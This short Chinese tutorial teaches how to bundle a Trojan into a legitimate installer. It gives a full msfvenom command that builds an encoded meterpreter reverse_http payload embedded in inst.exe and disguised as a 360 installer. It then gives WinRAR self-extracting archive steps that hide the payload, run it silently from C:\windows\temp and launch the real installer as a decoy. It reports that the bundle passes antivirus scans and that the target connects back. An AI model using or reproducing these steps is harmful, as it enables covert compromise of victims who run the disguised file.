msfvenom捆绑
缺点:不免杀。
-
准备被捆绑程序:
-
输入:
msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe
-
目标主机执行,成功上线:
自解压捆绑
- 下载WinRAR
- 选中正常文件inst.exe和木马文件360installer.exe,并添加到压缩文件:
- 常规-点击创建自解压格式压缩文件-改名(注意先勾选再改名):
- 高级-自解压选项-解压路径:
C:\windows\temp
- 设置-解压后运行:
- 模式-全部隐藏
- 更新-解压并更新文件&覆盖所有文件:
点击确认之后成功创建自解压文件:
修改图标后(图标修改方法):
- 静态查杀:
- 运行后动态查杀通过,成功上线,并且此时正常运行安装程序起到迷惑效果: